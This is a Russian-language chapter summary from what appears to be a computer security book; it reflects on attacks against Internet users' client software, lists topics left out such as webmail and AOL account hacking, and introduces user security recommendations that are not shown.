Резюме После написания этой главы нам хотелось бы облегченно вздохнуть и снова на несколько лет окунуться в дальнейшие исследования методов хакинга пользователей Internet. На самом деле за рамками книги осталось еше много материала на эту тему. Описать все разнообразие проверенных и непроверенных атак, применяемых против обычного клиентского программного обеспечения, оказалось непростым делом. Наряду с десятками остроумных подходов, разработанных такими яркими личностями, как Георгий Гунински, в окончательный вариант книги не попали многие вопросы, касающиеся взлома Web-серверов, предоставляющих услуги электронной почты (Hotmail), хакинга пользователей службы AOL, взлома линий связи с модулированной передачей данных в Internet и получения личных данных клиентов. Конечно, перед сообществом Internet еще долгие годы будут стоять все эти проблемы, а в будущем появятся новые, которые пока что даже трудно представить. Ниже приведены некоторые рекомендации, следуя которым, пользователи смогут обеспечить наиболее высокий уровень безопасности, который возможен на сегодняшний день.
|